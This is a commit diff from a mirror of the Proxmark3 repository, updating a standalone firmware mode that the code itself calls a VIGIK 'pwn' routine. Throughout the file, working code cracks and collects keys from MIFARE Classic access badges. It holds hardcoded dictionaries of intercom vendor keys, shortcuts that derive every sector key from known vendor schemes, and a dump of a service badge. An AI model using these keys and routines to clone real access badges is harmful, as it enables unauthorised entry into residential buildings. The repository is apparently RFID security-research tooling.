github/RRG-Proxmark3
1
0
Fork 0
mirror of https://github.com/RfidResearchGroup/proxmark3.git synced 2025-08-14 18:48:13 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

UPDATES HF_COLIN to current

Browse source
This commit is contained in:
Colin J. Brigato 2018-03-10 13:13:21 +01:00
commit 9147698e97
6 changed files with 1264 additions and 210 deletions
Download patch file Download diff file Expand all files Collapse all files

590
armsrc/Standalone/hf_colin.c
View file

@ -12,57 +12,150 @@
#define MF1KSZ 1024
#define MF1KSZSIZE 64
#define FALSE false
#define TRUE true
//#define FALSE false
//#define TRUE true
#define AUTHENTICATION_TIMEOUT 848
uint8_t cjuid[10];
uint32_t cjcuid;
int currline;
int currfline;
int curlline;
// TODO : Implement fast read of KEYS like in RFIdea
// als ohttp://ext.delaat.net/rp/2015-2016/p04/report.pdf
// Colin's VIGIKPWN sniff/simulate/clone repeat routine for HF Mifare
void cjPrintBigArray(const char *bigar, int len, uint8_t newlines, uint8_t debug) {
uint32_t chunksize = (USB_CMD_DATA_SIZE / 4);
uint8_t totalchunks = len / chunksize;
uint8_t last_chunksize = len - (totalchunks * chunksize);
char chunk[chunksize + 1];
memset(chunk, 0x00, sizeof(chunk));
if (debug > 0) {
Dbprintf("len : %d", len);
Dbprintf("chunksize : %d bytes", chunksize);
Dbprintf("totalchunks : %d", totalchunks);
Dbprintf("last_chunksize: %d", last_chunksize);
}
for (uint8_t i = 0; i < totalchunks; i++) {
memset(chunk, 0x00, sizeof(chunk));
memcpy(chunk, &bigar[i * chunksize], chunksize);
DbprintfEx(FLAG_RAWPRINT, "%s", chunk);
}
if (last_chunksize > 0) {
memset(chunk, 0x00, sizeof(chunk));
memcpy(chunk, &bigar[totalchunks * chunksize], last_chunksize);
DbprintfEx(FLAG_RAWPRINT, "%s", chunk);
}
if (newlines > 0) {
DbprintfEx(FLAG_NOLOG, " ");
}
}
void cjSetCursFRight() {
vtsend_cursor_position(NULL, 98, (currfline));
currfline++;
}
void cjSetCursRight() {
vtsend_cursor_position(NULL, 59, (currline));
currline++;
}
void cjSetCursLeft() {
vtsend_cursor_position(NULL, 0, (curlline));
curlline++;
}
void cjTabulize() { DbprintfEx(FLAG_RAWPRINT, "\t\t\t"); }
void cjPrintKey(uint64_t key, uint8_t *foundKey, uint16_t sectorNo, uint8_t type) {
char tosendkey[12];
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[0], foundKey[1], foundKey[2], foundKey[3], foundKey[4], foundKey[5]);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x | KEY : %s | TYP: %d", sectorNo, tosendkey, type);
}
void RunMod() {
currline = 20;
curlline = 20;
currfline = 24;
memset(cjuid, 0, sizeof(cjuid));
cjcuid = 0;
FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
// bool printKeys = false;
// bool simulation = true; // Simulates an exact copy of the target tag
// bool fillFromEmulator = true; // Dump emulator memory.
// We should get rid of this sh;
// uint8_t blockNo = 3; // Security block is number 3 for each sector.
uint8_t sectorsCnt = (MF1KSZ / MF1KSZSIZE);
uint64_t key64; // Defines current key
uint8_t *keyBlock = NULL; // Where the keys will be held in memory.
/*
Set of keys to be used.
This should cover ~98% of
French VIGIK system @2017
/* VIGIK EXPIRED DUMP FOR STUDY
Sector 0
121C7F730208040001FA33F5CB2D021D
44001049164916491649000000000000
00000000000000000000000000000000
A0A1A2A3A4A579678800010203040506
Sector 1
0F000000000000000000000000000000
AA0700002102080000740C110600AF13
000000000000000001740C1108220000
314B4947495679678800010203040506
Sector 2
24E572B923A3D243B402D60CAB576956
216D6501FC8618B6C426762511AC2DEE
25BF4CEC3618D0BAB3A6E9210D887746
314B4947495679678800010203040506
Sector 3
0FBC41A5D95398E76A1B2029E8EA9735
088BA2CE732653D0C1147596AFCF94D7
77B4D91F0442182273A29DEAF7A2D095
314B4947495679678800010203040506
Sector 4
4CEE715866E508CDBC95C640EC9D1E58
E800457CF8B079414E1B45DD3E6C9317
77B4D91F0442182273A29DEAF7A2D095
314B4947495679678800010203040506
010203040506 0
Sector 5-0F
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
KEY A : 1KGIV ;
ACCBITS : 796788[00]+VALUE
*/
/* know number of known keys for standalone mode */
//#define STKEYS 35
#define STKEYS 35
//----------------------------
// Set of keys to be used.
// This should cover ~98% of
// French VIGIK system @2017
//----------------------------
#define STKEYS 37
const uint64_t mfKeys[STKEYS] = {
0xffffffffffff, // TRANSPORTS
0x000000000000, // Blankkey
0x484558414354, // INFINEONON A / 0F SEC B
0x484558414354, // INFINEONON A / 0F SEC B / INTRATONE / HEXACT...
0x414c41524f4e, // ALARON NORALSY
0x424c41524f4e, // BLARON NORALSY
0x8829da9daf76, // URMET CAPTIV IF A => ALL A/B
0xb0b1b2b3b4b5, // NA
0xaabbccddeeff, // NA
0x4d3a99c351dd, // NA
0x1a982c7e459a, // NA
0xd3f7d3f7d3f7, // NA
0x714c5c886e97, // NA
0x587ee5f9350f, // NA
0xa0478cc39091, // NA
0x533cb6c723f6, // NA
0x8fd0a4f256e9, // NA
0x4a6352684677, // COMELIT A General Key / 08 [2] 004
0x536653644c65, // COMELIT B General Key / 08 [2] 004
0x8829da9daf76, // URMET CAPTIV IF A => ALL A/B / BTICINO
0x314B49474956, // "1KIGIV" VIGIK'S SERVICE BADGE A KEY
0xa0a1a2a3a4a5, // PUBLIC BLOC0 BTICINO MAD ACCESS
0x021209197591, // BTCINO UNDETERMINED SPREAKD 0x01->0x13 key
0x010203040506, // VIGIK's B Derivative
0xb0b1b2b3b4b5, // NA DERIVATE B # 1
0xaabbccddeeff, // NA DERIVATE B # 1
0x4d3a99c351dd, // NA DERIVATE B # 1
0x1a982c7e459a, // NA DERIVATE B # 1
0xd3f7d3f7d3f7, // NA DERIVATE B # 1
0x714c5c886e97, // NA DERIVATE B # 1
0x587ee5f9350f, // NA DERIVATE B # 1
0xa0478cc39091, // NA DERIVATE B # 1
0x533cb6c723f6, // NA DERIVATE B # 1
0x8fd0a4f256e9, // NA DERIVATE B # 1
0xa22ae129c013, // INFINEON B 00
0x49fae4e3849f, // INFINEON B 01
0x38fcf33072e0, // INFINEON B 02
@ -80,7 +173,7 @@ void RunMod() {
0x22729a9bd40f // INFINEON B 0E
};
/* Can remember something like that in case of Bigbuf */
// Can remember something like that in case of Bigbuf
keyBlock = BigBuf_malloc(STKEYS * 6);
int mfKeysCnt = sizeof(mfKeys) / sizeof(uint64_t);
@ -88,10 +181,9 @@ void RunMod() {
num_to_bytes(mfKeys[mfKeyCounter], 6, (uint8_t *)(keyBlock + mfKeyCounter * 6));
}
/* TODO : remember why we actually had need to initialize this array in such specific case
and why not a simple memset abuse to 0xffize the whole space in one go ? */
// uint8_t foundKey[2][40][6]; //= [ {0xff} ]; /* C99 abusal 6.7.8.21 */
// TODO : remember why we actually had need to initialize this array in such specific case
// and why not a simple memset abuse to 0xffize the whole space in one go ?
// uint8_t foundKey[2][40][6]; //= [ {0xff} ]; /* C99 abusal 6.7.8.21
uint8_t foundKey[2][40][6];
for (uint16_t t = 0; t < 2; t++) {
for (uint16_t sectorNo = 0; sectorNo < sectorsCnt; sectorNo++) {
@ -103,46 +195,77 @@ void RunMod() {
}
int key = -1;
// int block = 0;
bool err = 0;
bool trapped = 0;
bool allKeysFound = true;
uint32_t size = mfKeysCnt; /* whats the point for copy ? int should be
uint32_t in this case, same deal */
uint32_t size = mfKeysCnt;
LED_A_OFF();
LED_B_OFF();
LED_C_OFF();
LED_D_OFF();
LED_A_ON();
Dbprintf("%s>>%s C.J.B's MifareFastPwn Started", _RED_, _WHITE_);
Dbprintf("...Waiting For Tag...");
// banner:
vtsend_reset(NULL);
DbprintfEx(FLAG_NOLOG, "\r\n%s", clearTerm);
cjPrintBigArray(LOGO, sizeof(LOGO), 0, 0);
DbprintfEx(FLAG_NOLOG, "%s%s%s", _CYAN_, sub_banner, _WHITE_);
DbprintfEx(FLAG_NOLOG, "%s>>%s C.J.B's MifareFastPwn Started\r\n", _RED_, _WHITE_);
currline = 20;
curlline = 20;
currfline = 24;
cjSetCursLeft();
failtag:
vtsend_cursor_position_save(NULL);
vtsend_set_attribute(NULL, 1);
vtsend_set_attribute(NULL, 5);
DbprintfEx(FLAG_NOLOG, "\t\t\t[ Waiting For Tag ]");
vtsend_set_attribute(NULL, 0);
iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
while (!iso14443a_select_card(cjuid, NULL, &cjcuid, true, 0, true)) {
WDT_HIT();
}
FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
// SpinDelay(100);
SpinDelay(200);
vtsend_cursor_position_restore(NULL);
DbprintfEx(FLAG_NOLOG, "\t\t\t%s[ GOT a Tag ! ]%s", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "\t\t\t `---> Breaking keys ---->");
cjSetCursRight();
// Dbprintf("Got tag : %02x%02x%02x%02x", at91stdio_explode(cjuid, &cjcuid));
Dbprintf("Got tag : %02x%02x%02x%02x", cjuid[0], cjuid[1], cjuid[2], cjuid[3]);
DbprintfEx(FLAG_NOLOG, "\t%sGOT TAG :%s %08x%s", _RED_, _CYAN_, cjcuid, _WHITE_);
if (cjcuid == 0) {
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>%s BUG: 0000_CJCUID! Retrying...", _RED_, _WHITE_);
goto failtag;
}
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "--------+--------------------+-------");
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, " SECTOR | KEY | A/B ");
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "--------+--------------------+-------");
uint32_t end_time;
uint32_t start_time = end_time = GetTickCount();
/////////////////////////////////////////////////////////
//---------------------------------------------------------------------------
// WE SHOULD FIND A WAY TO GET UID TO AVOID THIS "TESTRUN"
// HERE IS TO BE THOUGHT AS ONLY A KEY SHOULD BE CHECK
// THEN WE FILL EMULATOR WITH KEY
// WHEN WE FILL EMULATOR CARD WITH A KEY
// IF THERE IS ANY FAIL DURING ANY POINT, WE START BACK CHECKING B KEYS
// THEN FILL EMULATOR WITH B KEEY
// THEN EMULATOR WITH CARD WITH B KEY
// IF IT HAS FAILED OF ANY OF SORT THEN WE ARE MARRON LIKE POMALO.
// --------------------------------------------------------
// + HERE IS TO BE THOUGHT AS ONLY A KEY SHOULD BE CHECK
// `-+ THEN WE FILL EMULATOR WITH KEY
// `-+ WHEN WE FILL EMULATOR CARD WITH A KEY
// `-+ IF THERE IS ANY FAIL DURING ANY POINT, WE START BACK CHECKING B KEYS
// `-+ THEN FILL EMULATOR WITH B KEEY
// `-+ THEN EMULATOR WITH CARD WITH B KEY
// `-+ IF IT HAS FAILED OF ANY OF SORT THEN WE ARE MARRON LIKE POMALO.
//----------------------------------------------------------------------------
// AN EVEN BETTER IMPLEMENTATION IS TO CHECK EVERY KEY FOR SECTOR 0 KEY A
// THEN IF FOUND CHECK THE SAME KEY FOR NEXT SECTOR ONLY KEY A
// THEN IF FAIL CHECK EVERY SECTOR A KEY FOR EVERY OTHER KEY BUT NOT THE BLOCK
@ -156,11 +279,10 @@ void RunMod() {
// DERIVATION
// THEN IF B KEY IS NOT OF THIS SCHEME CHECK EVERY REMAINING B KEYED SECTOR
// WITH EVERY REMAINING KEYS, BUT DISCARDING ANY DEFAULT TRANSPORT KEYS.
/////////////////////////////////////////////////////
//-----------------------------------------------------------------------------
// also we could avoid first UID check for every block
/* then lets expose this “optimal case” of “well known vigik schemes” : */
// then lets expose this “optimal case” of “well known vigik schemes” :
for (uint8_t type = 0; type < 2 && !err && !trapped; type++) {
for (int sec = 0; sec < sectorsCnt && !err && !trapped; ++sec) {
key = cjat91_saMifareChkKeys(sec * 4, type, NULL, size, &keyBlock[0], &key64);
@ -168,7 +290,7 @@ void RunMod() {
if (key == -1) {
err = 1;
allKeysFound = false;
/* used in “portable” imlementation on microcontroller: it reports back the fail and open the standalone lock */
// used in “portable” imlementation on microcontroller: it reports back the fail and open the standalone lock
// cmd_send(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0);
break;
} else if (key == -2) {
@ -178,20 +300,31 @@ void RunMod() {
break;
} else {
/* BRACE YOURSELF : AS LONG AS WE TRAP A KNOWN KEY, WE STOP CHECKING AND ENFORCE KNOWN SCHEMES */
// uint8_t tosendkey[12];
char tosendkey[12];
num_to_bytes(key64, 6, foundKey[type][sec]);
Dbprintf("SEC: %d ; KEY : %012" PRIx64 " ; TYP: %i", sec, key64, type);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %012" PRIx64 " ; TYP: %i", sec, key64, type);
/*cmd_send(CMD_CJB_INFORM_CLIENT_KEY, 12, sec, type, tosendkey, 12);*/
switch (key64) {
/////////////////////////////////////////////////////////
// COMMON SCHEME 1 : INFINITRON/HEXACT
case 0x484558414354:
Dbprintf("%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
Dbprintf(" .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
Dbprintf("%sDetected: %s INFI_HEXACT_VIGIK_TAG%s", _ORANGE_, _CYAN_, _WHITE_);
Dbprintf("...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
Dbprintf("%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, " .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%sDetected: %s INFI_HEXACT_VIGIK_TAG%s", _ORANGE_, _CYAN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
;
// Type 0 / A first
uint16_t t = 0;
@ -199,89 +332,122 @@ void RunMod() {
num_to_bytes(0x484558414354, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
}
t = 1;
uint16_t sectorNo = 0;
num_to_bytes(0xa22ae129c013, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 1;
num_to_bytes(0x49fae4e3849f, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 2;
num_to_bytes(0x38fcf33072e0, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 3;
num_to_bytes(0x8ad5517b4b18, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 4;
num_to_bytes(0x509359f131b1, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 5;
num_to_bytes(0x6c78928e1317, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 6;
num_to_bytes(0xaa0720018738, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 7;
num_to_bytes(0xa6cac2886412, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 8;
num_to_bytes(0x62d0c424ed8e, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 9;
num_to_bytes(0xe64a986a5d94, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 10;
num_to_bytes(0x8fa1d601d0a2, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 11;
num_to_bytes(0x89347350bd36, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 12;
num_to_bytes(0x66d2b7dc39ef, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 13;
num_to_bytes(0x6bc1e1ae547d, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 14;
num_to_bytes(0x22729a9bd40f, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
sectorNo = 15;
num_to_bytes(0x484558414354, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
trapped = 1;
break;
////////////////END OF SCHEME 1//////////////////////////////
@ -289,11 +455,23 @@ void RunMod() {
///////////////////////////////////////
// COMMON SCHEME 2 : URMET CAPTIVE / COGELEC!/?
case 0x8829da9daf76:
Dbprintf("%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
Dbprintf(" .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
Dbprintf("%sDetected :%sURMET_CAPTIVE_VIGIK_TAG%s", _ORANGE_, _CYAN_, _WHITE_);
Dbprintf("...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
Dbprintf("%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, " .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%sDetected :%sURMET_CAPTIVE_VIGIK_TAG%s", _ORANGE_, _CYAN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
cjSetCursLeft();
// emlClearMem();
// A very weak one...
for (uint16_t t = 0; t < 2; t++) {
@ -301,7 +479,9 @@ void RunMod() {
num_to_bytes(key64, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
}
}
trapped = 1;
@ -312,18 +492,30 @@ void RunMod() {
// COMMON SCHEME 3 : NORALSY "A-LARON & B-LARON . . . NORAL-B & NORAL-A"
case 0x414c41524f4e: // Thumbs up to the guy who had the idea of such a "mnemotechnical" key pair
case 0x424c41524f4e:
Dbprintf("%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
Dbprintf(" .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
Dbprintf("%s Detected :%sNORALSY_VIGIK_TAG %s", _ORANGE_, _CYAN_, _WHITE_);
Dbprintf("...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
Dbprintf("%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*STOP*!<<<<<<<<<<<<<<%s", _RED_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, " .TAG SEEMS %sDETERMINISTIC%s. ", _GREEN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s Detected :%sNORALSY_VIGIK_TAG %s", _ORANGE_, _CYAN_, _WHITE_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "...%s[%sKey_derivation_schemeTest%s]%s...", _YELLOW_, _GREEN_, _YELLOW_, _GREEN_);
cjSetCursLeft();
DbprintfEx(FLAG_NOLOG, "%s>>>>>>>>>>>>!*DONE*!<<<<<<<<<<<<<<%s", _GREEN_, _WHITE_);
;
t = 0;
for (uint16_t sectorNo = 0; sectorNo < sectorsCnt; sectorNo++) {
num_to_bytes(0x414c41524f4e, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
;
}
t = 1;
@ -331,7 +523,9 @@ void RunMod() {
num_to_bytes(0x424c41524f4e, 6, foundKey[t][sectorNo]);
sprintf(tosendkey, "%02x%02x%02x%02x%02x%02x", foundKey[t][sectorNo][0], foundKey[t][sectorNo][1], foundKey[t][sectorNo][2],
foundKey[t][sectorNo][3], foundKey[t][sectorNo][4], foundKey[t][sectorNo][5]);
Dbprintf("SEC: %d ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
cjSetCursRight();
DbprintfEx(FLAG_NOLOG, "SEC: %02x ; KEY : %s ; TYP: %d", sectorNo, tosendkey, t);
}
trapped = 1;
break;
@ -344,7 +538,10 @@ void RunMod() {
if (!allKeysFound) {
// cmd_send(CMD_CJB_FSMSTATE_MENU, 0, 0, 0, 0, 0);
Dbprintf("%s>> FAIL : did not found all the keys :'(%s", _RED_, _WHITE_);
cjSetCursLeft();
cjTabulize();
DbprintfEx(FLAG_NOLOG, "%s[ FAIL ]%s\r\n->did not found all the keys :'(", _RED_, _WHITE_);
cjSetCursLeft();
return;
}
